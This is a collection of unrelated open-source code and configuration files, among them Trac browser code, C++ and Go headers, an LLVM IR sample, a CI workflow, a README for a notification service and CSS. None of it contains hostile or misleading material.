node, raw_href, title = self._get_link_info(path, rev, formatter.href,
formatter.perm)
if not node:
return tag.a(label, class_='missing source')
link = tag.a(label, class_='source', href=src_href)
if raw_href:
link = tag(link, tag.a(u'\u200b', href=raw_href + fragment,
title=title,
class_='trac-rawlink' if node.isfile
else 'trac-ziplink'))
return link
PATH_LINK_RE = re.compile(r"([^@#:]*)" # path
r"[@:]([^#:]+)?" # rev
r"(?::(\d+(?:-\d+)?(?:,\d+(?:-\d+)?)*))?" # marks
)
def _get_link_info(self, path, rev, href, perm):
rm = RepositoryManager(self.env)
node = raw_href = title = None
try:
reponame, repos, npath = rm.get_repository_by_path(path)
node = get_allowed_node(repos, npath, rev, perm)
if node is not None:
raw_href = self._get_download_href(href, repos, node, rev)
title = _("Download") if node.isfile \
else _("Download as Zip archive")
except TracError:
pass
return node, raw_href, title
# IHTMLPreviewAnnotator methods
def get_annotation_type(self):
return 'blame', _('Rev'), _('Revision in which the line changed')
def get_annotation_data(self, context):
"""Cache the annotation data corresponding to each revision."""
return BlameAnnotator(self.env, context)
def annotate_row(self, context, row, lineno, line, blame_annotator):
blame_annotator.annotate(row, lineno)
# IWikiMacroProvider methods
def get_macros(self):
yield "RepositoryIndex"
def get_macro_description(self, name):
description = cleandoc_("""
Display the list of available repositories.
Can be given the following named arguments:
''format''::
Select the rendering format:
- ''compact'' produces a comma-separated list of repository prefix
names (default)
- ''list'' produces a description list of repository prefix names
- ''table'' produces a table view, similar to the one visible in
the ''Browse View'' page
''glob''::
Do a glob-style filtering on the repository names (defaults to '*')
''order''::
Order repositories by the given column (one of "name", "date" or
"author")
''desc''::
When set to 1, order by descending order
""")
return 'messages', description
def expand_macro(self, formatter, name, content):
args, kwargs = parse_args(content)
format = kwargs.get('format', 'compact')
glob = kwargs.get('glob', '*')
order = kwargs.get('order')
desc = as_bool(kwargs.get('desc', 0))
rm = RepositoryManager(self.env)
all_repos = dict(rdata for rdata in rm.get_all_repositories().items()
if fnmatchcase(rdata[0], glob))
if format == 'table':
repo = self._render_repository_index(formatter.context, all_repos,
order, desc)
add_stylesheet(formatter.req, 'common/css/browser.css')
wiki_format_messages = self.config['changeset'] \
.getbool('wiki_format_messages')
data = {'repo': repo, 'order': order, 'desc': 1 if desc else None,
'reponame': None, 'path': '/', 'stickyrev': None,
'wiki_format_messages': wiki_format_messages}
return Chrome(self.env).render_fragment(formatter.context.req,
'repository_index.html',
data)
def get_repository(reponame):
try:
return rm.get_repository(reponame)
except TracError:
return
all_repos = [(reponame, get_repository(reponame))
for reponame in all_repos]
all_repos = sorted(((reponame, repos) for reponame, repos in all_repos
if repos
and not as_bool(repos.params.get('hidden'))
and repos.is_viewable(formatter.perm)),
reverse=desc)
def repolink(reponame, repos):
label = reponame or _('(default)')
return Markup(tag.a(label,
title=_('View repository %(repo)s', repo=label),
href=formatter.href.browser(repos.reponame or None)))
if format == 'list':
return tag.dl([
tag(tag.dt(repolink(reponame, repos)),
tag.dd(repos.params.get('description')))
for reponame, repos in all_repos])
else: # compact
return Markup(', ').join(repolink(reponame, repos)
for reponame, repos in all_repos)
class BlameAnnotator(object):
def __init__(self, env, context):
self.env = env
self.context = context
rm = RepositoryManager(self.env)
self.repos = rm.get_repository(context.resource.parent.id)
self.path = context.resource.id
self.rev = context.resource.version
# maintain state
self.prev_chgset = None
self.chgset_data = {}
add_script(context.req, 'common/js/blame.js')
add_stylesheet(context.req, 'common/css/changeset.css')
add_stylesheet(context.req, 'common/css/diff.css')
self.reset()
def reset(self):
rev = self.rev
node = self.repos.get_node(self.path, rev)
# FIXME: get_annotations() should be in the Resource API
# -- get revision numbers for each line
self.annotations = node.get_annotations()
# -- from the annotations, retrieve changesets and
# determine the span of dates covered, for the color code.
# Note: changesets[i].rev can differ from annotations[i]
# (long form vs. compact, short rev form for the latter).
self.changesets = []
chgset = self.repos.get_changeset(rev)
chgsets = {rev: chgset}
self.timerange = TimeRange(chgset.date)
for idx in xrange(len(self.annotations)):
rev = self.annotations[idx]
chgset = chgsets.get(rev)
if not chgset:
chgset = self.repos.get_changeset(rev)
chgsets[rev] = chgset
self.timerange.insert(chgset.date)
# get list of changeset parallel to annotations
self.changesets.append(chgset)
# -- retrieve the original path of the source, for each rev
# (support for copy/renames)
self.paths = {}
for path, rev, chg in node.get_history():
self.paths[rev] = path
# -- get custom colorize function
browser = BrowserModule(self.env)
self.colorize_age = browser.get_custom_colorizer()
def annotate(self, row, lineno):
if lineno > len(self.annotations):
row.append(tag.th())
return
rev = self.annotations[lineno-1]
chgset = self.changesets[lineno-1]
path = self.paths.get(rev)
# Note: path will be None if copy/rename is not supported
# by get_history
# -- compute anchor and style once per revision
if rev not in self.chgset_data:
chgset_href = \
self.context.href.changeset(rev, self.repos.reponame or None,
path)
short_author = chgset.author.split(' ', 1)[0]
title = shorten_line('%s: %s' % (short_author, chgset.message))
anchor = tag.a('[%s]' % self.repos.short_rev(rev), # shortname
title=title, href=chgset_href)
color = self.colorize_age(self.timerange.relative(chgset.date))
style = 'background-color: rgb(%d, %d, %d);' % color
self.chgset_data[rev] = (anchor, style)
else:
anchor, style = self.chgset_data[rev]
if self.prev_chgset != chgset:
self.prev_style = style
# optimize away the path if there's no copy/rename info
if not path or path == self.path:
path = ''
# -- produce blame column, eventually with an anchor
style = self.prev_style
if lineno < len(self.changesets) and self.changesets[lineno] == chgset:
style += ' border-bottom: none;'
blame_col = tag.th(style=style, class_='blame r%s' % rev)
if self.prev_chgset != chgset:
blame_col.append(anchor)
self.prev_chgset = chgset
row.append(blame_col)
| {
"pile_set_name": "Github"
} |
// Unity C# reference source
// Copyright (c) Unity Technologies. For terms of use, see
// https://unity3d.com/legal/licenses/Unity_Reference_Only_License
using UnityEngine.UIElements;
namespace UnityEditor.UIElements
{
public class ToolbarPopupSearchField : ToolbarSearchField, IToolbarMenuElement
{
public new class UxmlFactory : UxmlFactory<ToolbarPopupSearchField> {}
public DropdownMenu menu { get; }
public ToolbarPopupSearchField()
{
AddToClassList(popupVariantUssClassName);
menu = new DropdownMenu();
searchButton.clickable.clicked += this.ShowMenu;
}
}
}
| {
"pile_set_name": "Github"
} |
/**
* @file methods/ann/visitor/backward_visitor.hpp
* @author Marcus Edel
*
* This file provides an abstraction for the Backward() function for different
* layers and automatically directs any parameter to the right layer type.
*
* mlpack is free software; you may redistribute it and/or modify it under the
* terms of the 3-clause BSD license. You should have received a copy of the
* 3-clause BSD license along with mlpack. If not, see
* http://www.opensource.org/licenses/BSD-3-Clause for more information.
*/
#ifndef MLPACK_METHODS_ANN_VISITOR_BACKWARD_VISITOR_HPP
#define MLPACK_METHODS_ANN_VISITOR_BACKWARD_VISITOR_HPP
#include <mlpack/methods/ann/layer/layer_traits.hpp>
#include <mlpack/methods/ann/layer/layer_types.hpp>
#include <boost/variant.hpp>
namespace mlpack {
namespace ann {
/**
* BackwardVisitor executes the Backward() function given the input, error and
* delta parameter.
*/
class BackwardVisitor : public boost::static_visitor<void>
{
public:
//! Execute the Backward() function given the input, error and delta
//! parameter.
BackwardVisitor(const arma::mat& input,
const arma::mat& error,
arma::mat& delta);
//! Execute the Backward() function for the layer with the specified index.
BackwardVisitor(const arma::mat& input,
const arma::mat& error,
arma::mat& delta,
const size_t index);
//! Execute the Backward() function.
template<typename LayerType>
void operator()(LayerType* layer) const;
void operator()(MoreTypes layer) const;
private:
//! The input parameter set.
const arma::mat& input;
//! The error parameter.
const arma::mat& error;
//! The delta parameter.
arma::mat& delta;
//! The index of the layer to run.
size_t index;
//! Indicates whether to use the index or not.
bool hasIndex;
//! Execute the Backward() function if the module does not have a Run()
//! check.
template<typename T>
typename std::enable_if<
!HasRunCheck<T, bool&(T::*)(void)>::value, void>::type
LayerBackward(T* layer, arma::mat& input) const;
//! Execute the Backward() function if the module has a Run() check.
template<typename T>
typename std::enable_if<
HasRunCheck<T, bool&(T::*)(void)>::value, void>::type
LayerBackward(T* layer, arma::mat& input) const;
};
} // namespace ann
} // namespace mlpack
// Include implementation.
#include "backward_visitor_impl.hpp"
#endif
| {
"pile_set_name": "Github"
} |
// Copyright 2015 The Prometheus Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Package expfmt contains tools for reading and writing Prometheus metrics.
package expfmt
// Format specifies the HTTP content type of the different wire protocols.
type Format string
// Constants to assemble the Content-Type values for the different wire protocols.
const (
TextVersion = "0.0.4"
ProtoType = `application/vnd.google.protobuf`
ProtoProtocol = `io.prometheus.client.MetricFamily`
ProtoFmt = ProtoType + "; proto=" + ProtoProtocol + ";"
// The Content-Type values for the different wire protocols.
FmtUnknown Format = `<unknown>`
FmtText Format = `text/plain; version=` + TextVersion + `; charset=utf-8`
FmtProtoDelim Format = ProtoFmt + ` encoding=delimited`
FmtProtoText Format = ProtoFmt + ` encoding=text`
FmtProtoCompact Format = ProtoFmt + ` encoding=compact-text`
)
const (
hdrContentType = "Content-Type"
hdrAccept = "Accept"
)
| {
"pile_set_name": "Github"
} |
//
// LLResignView.h
// Olla
//
// Created by null on 14-11-4.
// Copyright (c) 2014 xiaoran. All rights reserved.
//
#import <UIKit/UIKit.h>
// Typically used to dismiss the keyboard
@interface OllaResignView : UIView
@end
| {
"pile_set_name": "Github"
} |
Car -1 -1 -10 160 199 353 302 1.44 1.56 3.47 -6.09 1.97 12.80 1.64 1.00
Car -1 -1 -10 694 179 808 256 1.49 1.63 4.14 3.02 1.66 16.48 -1.61 1.00
Car -1 -1 -10 308 193 426 260 1.42 1.60 3.96 -6.06 2.00 18.35 1.59 1.00
Car -1 -1 -10 407 178 483 228 1.70 1.70 4.28 -6.03 1.91 26.78 1.61 1.00
Car -1 -1 -10 452 184 505 219 1.48 1.57 3.99 -6.04 2.04 33.44 1.61 0.98
Car -1 -1 -10 560 180 584 199 1.53 1.67 3.93 -3.12 2.18 60.35 1.61 0.86
Car -1 -1 -10 633 176 655 193 1.47 1.62 3.64 3.16 1.79 65.39 -1.41 0.50
Car -1 -1 -10 701 166 734 193 1.66 1.61 3.31 6.72 1.26 45.41 -1.57 0.40
Car -1 -1 -10 491 181 525 209 1.59 1.62 3.88 -6.28 2.17 44.68 1.55 0.30
Car -1 -1 -10 523 181 548 201 1.49 1.64 3.82 -6.04 2.25 58.92 1.58 0.27
Car -1 -1 -10 804 159 848 196 1.54 1.59 3.73 9.66 0.99 32.53 -1.37 0.03
| {
"pile_set_name": "Github"
} |
Changes for 1.3.0:
* New feature: death tests on Windows, Cygwin, and Mac.
* New feature: ability to use Google Test assertions in other testing
frameworks.
* New feature: ability to run disabled test via
--gtest_also_run_disabled_tests.
* New feature: the --help flag for printing the usage.
* New feature: access to Google Test flag values in user code.
* New feature: a script that packs Google Test into one .h and one
.cc file for easy deployment.
* New feature: support for distributing test functions to multiple
machines (requires support from the test runner).
* Bug fixes and implementation clean-up.
Changes for 1.2.1:
* Compatibility fixes for Linux IA-64 and IBM z/OS.
* Added support for using Boost and other TR1 implementations.
* Changes to the build scripts to support upcoming release of Google C++
Mocking Framework.
* Added Makefile to the distribution package.
* Improved build instructions in README.
Changes for 1.2.0:
* New feature: value-parameterized tests.
* New feature: the ASSERT/EXPECT_(NON)FATAL_FAILURE(_ON_ALL_THREADS)
macros.
* Changed the XML report format to match JUnit/Ant's.
* Added tests to the Xcode project.
* Added scons/SConscript for building with SCons.
* Added src/gtest-all.cc for building Google Test from a single file.
* Fixed compatibility with Solaris and z/OS.
* Enabled running Python tests on systems with python 2.3 installed,
e.g. Mac OS X 10.4.
* Bug fixes.
Changes for 1.1.0:
* New feature: type-parameterized tests.
* New feature: exception assertions.
* New feature: printing elapsed time of tests.
* Improved the robustness of death tests.
* Added an Xcode project and samples.
* Adjusted the output format on Windows to be understandable by Visual Studio.
* Minor bug fixes.
Changes for 1.0.1:
* Added project files for Visual Studio 7.1.
* Fixed issues with compiling on Mac OS X.
* Fixed issues with compiling on Cygwin.
Changes for 1.0.0:
* Initial Open Source release of Google Test
| {
"pile_set_name": "Github"
} |
name: Lint Ruby
on:
push:
branches:
- master
pull_request:
jobs:
rubocop:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: ruby/setup-ruby@v1
with:
ruby-version: 2.7
- name: Lint Ruby code with RuboCop
run: |
gem install bundler
bundle install --gemfile gemfiles/rubocop.gemfile --jobs 4 --retry 3
bundle exec --gemfile gemfiles/rubocop.gemfile rubocop
| {
"pile_set_name": "Github"
} |
; ModuleID = 'llvm_expressions/sample20-virt-anti-branch-analysis-branchFuns.ll'
source_filename = "llvm_expressions/sample20-virt-anti-branch-analysis-branchFuns.ll"
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"
; Function Attrs: norecurse nounwind readnone
define i64 @SECRET(i64 %SymVar_0) local_unnamed_addr #0 {
.3:
%.4 = and i64 %SymVar_0, 8722064
%.5 = or i64 %.4, 520257826
%.6 = and i64 %.5, %SymVar_0
%.13 = shl i64 %.6, 57
%.16 = lshr i64 %.6, 7
%.17 = or i64 %.13, %.16
%.20 = mul i64 %SymVar_0, 107672031
%.22 = add i64 %.17, %.20
%.24 = lshr i64 %.22, 56
%0 = lshr i64 %.22, 54
%.163 = and i64 %.24, %0
%.164 = shl nuw nsw i64 %.163, 4
%.167 = and i64 %.164, 208
%.196 = or i64 %.167, %.5
%.199 = lshr exact i64 %.6, 1
%.200 = and i64 %.199, 8
%.201 = or i64 %.200, 1
%.202 = sub nsw i64 64, %.201
%.208 = shl i64 %.196, %.202
%.219 = lshr i64 %.196, %.201
%.220 = or i64 %.208, %.219
%.265 = or i64 %0, %.24
%.266 = and i64 %.265, 14
%.267 = or i64 %.266, 1
%.268 = sub nsw i64 64, %.267
%.274 = lshr i64 %.220, %.268
%.351 = shl i64 %.220, %.267
%.352 = or i64 %.274, %.351
ret i64 %.352
}
attributes #0 = { norecurse nounwind readnone }
| {
"pile_set_name": "Github"
} |
{
"desc": "Sierra MC8765",
"control": 0,
"data": 2
}
| {
"pile_set_name": "Github"
} |
/*
* thd_engine.h: thermal engine class interface
*
* Copyright (C) 2012 Intel Corporation. All rights reserved.
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License version
* 2 or later as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
* 02110-1301, USA.
*
*
* Author Name <[email protected]>
*
*/
#ifndef THD_ENGINE_H_
#define THD_ENGINE_H_
#include <pthread.h>
#include <poll.h>
#include <time.h>
#include "thd_common.h"
#include "thd_sys_fs.h"
#include "thd_preference.h"
#include "thd_sensor.h"
#include "thd_sensor_virtual.h"
#include "thd_zone.h"
#include "thd_cdev.h"
#include "thd_parse.h"
#include "thd_kobj_uevent.h"
#include "thd_rapl_power_meter.h"
#define MAX_MSG_SIZE 512
#define THD_NUM_OF_POLL_FDS 10
typedef enum {
WAKEUP,
TERMINATE,
PREF_CHANGED,
THERMAL_ZONE_NOTIFY,
RELOAD_ZONES,
POLL_ENABLE,
POLL_DISABLE,
FAST_POLL_ENABLE,
FAST_POLL_DISABLE,
} message_name_t;
// This defines whether the thermal control is entirely done by
// this daemon or it just complements, what is done in kernel
typedef enum {
COMPLEMENTRY, EXCLUSIVE,
} control_mode_t;
typedef struct {
message_name_t msg_id;
int msg_size;
unsigned long msg[MAX_MSG_SIZE];
} message_capsul_t;
typedef struct {
unsigned int family;
unsigned int model;
} supported_ids_t;
class cthd_engine {
protected:
std::vector<cthd_zone *> zones;
std::vector<cthd_sensor *> sensors;
std::vector<cthd_cdev *> cdevs;
int current_cdev_index;
int current_zone_index;
int current_sensor_index;
bool parse_thermal_zone_success;
bool parse_thermal_cdev_success;
std::string uuid;
bool parser_disabled;
private:
int poll_timeout_msec;
int wakeup_fd;
int uevent_fd;
control_mode_t control_mode;
int write_pipe_fd;
int preference;
bool status;
time_t thz_last_uevent_time;
time_t thz_last_temp_ind_time;
time_t thz_last_update_event_time;
bool terminate;
int genuine_intel;
int has_invariant_tsc;
int has_aperf;
bool proc_list_matched;
int poll_interval_sec;
cthd_preference thd_pref;
unsigned int poll_sensor_mask;
unsigned int fast_poll_sensor_mask;
int saved_poll_interval;
std::string config_file;
pthread_t thd_engine;
pthread_attr_t thd_attr;
pthread_mutex_t thd_engine_mutex;
std::vector<std::string> zone_preferences;
static const int thz_notify_debounce_interval = 3;
struct pollfd poll_fds[THD_NUM_OF_POLL_FDS];
int poll_fd_cnt;
bool rt_kernel;
cthd_kobj_uevent kobj_uevent;
bool parser_init_done;
int proc_message(message_capsul_t *msg);
void process_pref_change();
void thermal_zone_change(message_capsul_t *msg);
void process_terminate();
void check_for_rt_kernel();
public:
static const int max_thermal_zones = 10;
static const int max_cool_devs = 50;
static const int def_poll_interval = 4000;
static const int soft_cdev_start_index = 100;
cthd_parse parser;
cthd_rapl_power_meter rapl_power_meter;
cthd_engine(std::string _uuid);
virtual ~cthd_engine();
void set_control_mode(control_mode_t mode) {
control_mode = mode;
}
control_mode_t get_control_mode() {
return control_mode;
}
void thd_engine_thread();
virtual int thd_engine_start(bool ignore_cpuid_check);
int thd_engine_stop();
int check_cpu_id();
bool set_preference(const int pref);
void thd_engine_terminate();
void thd_engine_calibrate();
int thd_engine_set_user_max_temp(const char *zone_type,
const char *user_set_point);
int thd_engine_set_user_psv_temp(const char *zone_type,
const char *user_set_point);
void poll_enable_disable(bool status, message_capsul_t *msg);
void fast_poll_enable_disable(bool status, message_capsul_t *msg);
cthd_cdev *thd_get_cdev_at_index(int index);
void send_message(message_name_t msg_id, int size, unsigned char *msg);
void takeover_thermal_control();
void giveup_thermal_control();
void thd_engine_poll_enable(int sensor_id);
void thd_engine_poll_disable(int sensor_id);
void thd_engine_fast_poll_enable(int sensor_id);
void thd_engine_fast_poll_disable(int sensor_id);
void thd_read_default_thermal_sensors();
void thd_read_default_thermal_zones();
void thd_read_default_cooling_devices();
virtual void update_engine_state() {};
virtual int read_thermal_sensors() {
return 0;
}
;
virtual int read_thermal_zones() {
return 0;
}
;
virtual int read_cooling_devices() {
return 0;
}
;
int use_custom_zones() {
return parse_thermal_zone_success;
}
int use_custom_cdevs() {
return parse_thermal_cdev_success;
}
static const int max_cpu_count = 64;
time_t last_cpu_update[max_cpu_count];
virtual bool apply_cpu_operation(int cpu) {
return false;
}
int get_poll_timeout_ms() {
return poll_timeout_msec;
}
int get_poll_timeout_sec() {
return poll_timeout_msec / 1000;
}
void thd_engine_reload_zones();
bool processor_id_match() {
return proc_list_matched;
}
int get_poll_interval() {
return poll_interval_sec;
}
void set_poll_interval(int val) {
poll_interval_sec = val;
}
int get_preference() {
return preference;
}
void set_config_file(std::string conf_file) {
config_file = conf_file;
}
std::string get_config_file() {
return config_file;
}
virtual ppcc_t *get_ppcc_param(std::string name);
cthd_zone *search_zone(std::string name);
cthd_cdev *search_cdev(std::string name);
cthd_sensor *search_sensor(std::string name);
cthd_sensor *get_sensor(int index);
cthd_zone *get_zone(int index);
cthd_zone *get_zone(std::string type);
int get_sensor_temperature(int index, unsigned int *temperature);
unsigned int get_sensor_count() {
return sensors.size();
}
unsigned int get_zone_count() {
return zones.size();
}
unsigned int get_cdev_count() {
return cdevs.size();
}
void add_zone(cthd_zone *zone) {
zones.push_back(zone);
}
bool rt_kernel_status() {
return rt_kernel;
}
virtual void workarounds() {
}
// User/External messages
int user_add_sensor(std::string name, std::string path);
cthd_sensor *user_get_sensor(unsigned int index);
cthd_zone *user_get_zone(unsigned int index);
int user_add_virtual_sensor(std::string name, std::string dep_sensor,
double slope, double intercept);
int user_set_psv_temp(std::string name, unsigned int temp);
int user_set_max_temp(std::string name, unsigned int temp);
int user_add_zone(std::string zone_name, unsigned int trip_temp,
std::string sensor_name, std::string cdev_name);
int user_set_zone_status(std::string name, int status);
int user_get_zone_status(std::string name, int *status);
int user_delete_zone(std::string name);
int user_add_cdev(std::string cdev_name, std::string cdev_path,
int min_state, int max_state, int step);
cthd_cdev *user_get_cdev(unsigned int index);
int parser_init();
void parser_deinit();
};
#endif /* THD_ENGINE_H_ */
| {
"pile_set_name": "Github"
} |
;
; 2016-02-28, Groepaz
; 2017-06-15, Greg King
;
; unsigned char cpeekrevers (void);
;
.export _cpeekrevers
; Get a system-specific file.
; Note: The cbm610, and c128 targets need special
; versions that handle RAM banking and the 80-column VDC.
.if .def(__C16__)
.include "plus4.inc" ; both C16 and Plus4
.elseif .def(__C64__)
.include "c64.inc"
.elseif .def(__CBM510__)
.import CURS_X: zp, SCREEN_PTR: zp
.include "cbm510.inc"
.elseif .def(__PET__)
.include "pet.inc"
.elseif .def(__VIC20__)
.include "vic20.inc"
.endif
_cpeekrevers:
ldy CURS_X
lda (SCREEN_PTR),y ; get screen code
and #$80 ; get reverse bit
asl a
tax ; ldx #>$0000
rol a ; return boolean value
rts
| {
"pile_set_name": "Github"
} |
package org.mafagafogigante.dungeon.commands;
import org.mafagafogigante.dungeon.logging.DungeonLogger;
import org.jetbrains.annotations.NotNull;
import java.util.Locale;
/**
* Simple wrapper for a name and info of a Command.
*/
public class CommandDescription {
private final String name;
private final String info;
/**
* Creates a CommandDescription with the provided name and info.
*
* @param name a String for name, not null, lowercase
* @param info a String for info, nullable
*/
CommandDescription(@NotNull String name, String info) {
if (isNotLowercase(name)) {
DungeonLogger.warning("Passed a String that was not lowercase as name for a CommandDescription.");
name = name.toLowerCase(Locale.ENGLISH);
}
this.name = name;
this.info = info;
}
/**
* Checks if a String is not lowercase.
*
* @param string the String to be tested, not null
* @return true if the String is not lowercase, false if it is lowercase
*/
private static boolean isNotLowercase(String string) {
for (char c : string.toCharArray()) {
if (!Character.isLowerCase(c)) {
return true;
}
}
return false;
}
public String getName() {
return name;
}
public String getInfo() {
return info;
}
@Override
public String toString() {
return getName() + " : " + getInfo();
}
}
| {
"pile_set_name": "Github"
} |
cd C:\adt32\sdk\tools
start emulator -avd avd_api_14
cd C:\android-neon\eclipse\workspace\AppCustomCameraDemo1
| {
"pile_set_name": "Github"
} |
<div class="submit-form">
<table class="submit-table">
<tr>
<td class="label">ID:</td>
<td>
<input name="id" class="easyui-textbox" data-options="disabled: true">
</td>
</tr>
<tr>
<td class="label">访问用户:</td>
<td>
<input name="username" class="easyui-textbox" data-options="disabled: true">
</td>
</tr>
<tr>
<td class="label">用户 IP:</td>
<td>
<input name="ipAddress" class="easyui-textbox" data-options="disabled: true">
</td>
</tr>
<tr>
<td class="label">操作类型:</td>
<td>
<input name="operationType" class="easyui-textbox" data-options="disabled: true">
</td>
</tr>
<tr>
<td class="label">操作说明:</td>
<td><input name="operation" class="easyui-textbox" style="height:50px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">请求耗时(毫秒):</td>
<td>
<input name="consumingTime" class="easyui-textbox" data-options="disabled: true">
</td>
</tr>
<tr>
<td class="label">请求地址(url):</td>
<td><input name="requestUrl" class="easyui-textbox" style="height:50px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">请求方法:</td>
<td><input name="requestMethod" class="easyui-textbox" style="height:50px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">请求参数:</td>
<td><input name="requestParameter" class="easyui-textbox" style="height:50px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">请求语言:</td>
<td>
<input name="acceptLanguage" class="easyui-textbox" data-options="disabled: true">
</td>
</tr>
<tr>
<td class="label">请求来源:</td>
<td><input name="referer" class="easyui-textbox" style="height:50px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">用户代理:</td>
<td><input name="userAgent" class="easyui-textbox" style="height:100px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">Handler:</td>
<td><input name="handler" class="easyui-textbox" style="height:100px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">异常堆栈:</td>
<td><input name="stackTrace" class="easyui-textbox" style="height:100px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">Session ID:</td>
<td><input name="sessionId" class="easyui-textbox" style="height:50px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">Cookie:</td>
<td><input name="cookie" class="easyui-textbox" style="height:100px;"
data-options="disabled: true,multiline:true"></td>
</tr>
<tr>
<td class="label">响应状态码:</td>
<td>
<input name="status" class="easyui-textbox" data-options="disabled: true">
</td>
</tr>
<tr>
<td class="label">创建时间:</td>
<td>
<input name="gmtCreated" class="easyui-textbox" data-options="disabled: true">
</td>
</tr>
</table>
</div>
| {
"pile_set_name": "Github"
} |
## Nudge
Nudge is a service designed to email token holders when their key purchase transactions have been successfully mined.
### How does it work?
The service fetches newly minted tokens from a GraphQL monitoring service.
Upon finding new tokens, the service will check to see if it has already been processed and if not if an email
address has been attached. In its current implementation, Nudge will look for the owner metadata associated with the key purchase. The values of the `protected.emailAddress` field (if applicable), will be used to send [an email confirming the key purchase](https://github.com/unlock-protocol/unlock/blob/master/wedlocks/src/templates/keyMined.js).
Under these conditions an email will be dispatched and upon successful dispatch will be recorded as so in order to avoid "duplicate" emails.
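A minimal sketch of that loop in plain JavaScript is shown below. The helper names (`fetchMintedKeys`, `hasBeenProcessed`, `markProcessed`, `sendKeyMinedEmail`) are illustrative assumptions, not the actual Nudge API; the dependencies are injected so the sketch stays self-contained.

```js
// Hypothetical sketch of the Nudge processing loop (helper names are assumptions).
async function processNewKeys({ fetchMintedKeys, hasBeenProcessed, markProcessed, sendKeyMinedEmail }) {
  // Newly minted keys, as reported by the GraphQL monitoring service.
  const keys = await fetchMintedKeys();
  for (const key of keys) {
    // Skip keys that were already handled in a previous run.
    if (await hasBeenProcessed(key.id)) continue;
    // Only dispatch when the owner metadata carries an email address.
    const metadata = key.metadata || {};
    const email = metadata.protected && metadata.protected.emailAddress;
    if (!email) continue;
    // Send the confirmation, then record the dispatch to avoid duplicate emails.
    await sendKeyMinedEmail(email, key);
    await markProcessed(key.id);
  }
}
```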
### Considerations
The service was designed to be fairly simple, reflecting the current usage of the ecosystem. If the demand increases,
the requests for data processing should be queued, with the requisite parallelization provided via workers.
### Running the application
Nudge includes a Dockerfile, which is the easiest way to run the application. The following ENV variables need to be passed to the container (a sketch of how they might be read follows the list):
* DB_USERNAME
* DB_PASSWORD
* DB_NAME
* DB_HOSTNAME
* WEB3_PROVIDER_HOST
* WEDLOCKS_URI
* GRAPHQL_BASE_URL
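As a rough illustration only (assuming the service reads its configuration from `process.env`, as Node.js services typically do — this is not the actual Nudge config module), the variables above could be collected like this:

```js
// Illustrative only: gather the documented environment variables in Node.js.
const config = {
  db: {
    username: process.env.DB_USERNAME,
    password: process.env.DB_PASSWORD,
    name: process.env.DB_NAME,
    hostname: process.env.DB_HOSTNAME,
  },
  web3ProviderHost: process.env.WEB3_PROVIDER_HOST,
  wedlocksUri: process.env.WEDLOCKS_URI,
  graphQLBaseUrl: process.env.GRAPHQL_BASE_URL,
};

module.exports = config;
```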
| {
"pile_set_name": "Github"
} |
/**
* phantomjs script for printing presentations to PDF.
*
* Example:
* phantomjs print-pdf.js "http://lab.hakim.se/reveal-js?print-pdf" reveal-demo.pdf
*
* By Manuel Bieh (https://github.com/manuelbieh)
*/
// html2pdf.js
var page = new WebPage();
var system = require( 'system' );
var slideWidth = system.args[3] ? system.args[3].split( 'x' )[0] : 960;
var slideHeight = system.args[3] ? system.args[3].split( 'x' )[1] : 700;
page.viewportSize = {
width: slideWidth,
height: slideHeight
};
// TODO
// Something is wrong with these config values. An input
// paper width of 1920px actually results in a 756px wide
// PDF.
page.paperSize = {
width: Math.round( slideWidth * 2 ),
height: Math.round( slideHeight * 2 ),
border: 0
};
var inputFile = system.args[1] || 'index.html?print-pdf';
var outputFile = system.args[2] || 'slides.pdf';
if( outputFile.match( /\.pdf$/gi ) === null ) {
outputFile += '.pdf';
}
console.log( 'Printing PDF (Paper size: '+ page.paperSize.width + 'x' + page.paperSize.height +')' );
page.open( inputFile, function( status ) {
window.setTimeout( function() {
		console.log( 'Printed successfully' );
page.render( outputFile );
phantom.exit();
}, 1000 );
} );
| {
"pile_set_name": "Github"
} |
*
{
-webkit-transition: all .25s ease-in-out;
-moz-transition: all .25s ease-in-out;
    transition: all .25s ease-in-out;
}
html, body
{
font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
font-size: 85%;
color: #4b5554;
text-shadow: 0 1px 0 rgba(255,255,255,.5);
}
.cover
{
width: 100%;
height: 368px;
margin: 0;
padding: 0;
background: url('../img/cover.png') no-repeat top center fixed;
background-color: #ffebee;
}
nav li
{
display: inline-block;
list-style: none;
}
.nav-main,
.nav-credits
{
float: right;
}
.nav-main li,
.nav-credits li
{
margin-left: 1.85em;
}
.spotlight
{
text-align: center;
}
a
{
text-decoration: none;
text-transform: uppercase;
color: #69706f;
}
a:hover
{
color: #000;
}
header
{
padding: 30px 0;
}
.spotlight h1
{
font-size: 2.5em;
font-weight: 100;
margin-bottom: 1em;
}
.spotlight h1 strong
{
display: inline;
font-weight: 500;
}
.spotlight h2
{
font-size: 1.25em;
font-weight: 300;
line-height: 1.5em;
margin-bottom: 5em;
}
.spotlight-image
{
margin: 8em 0 10em;
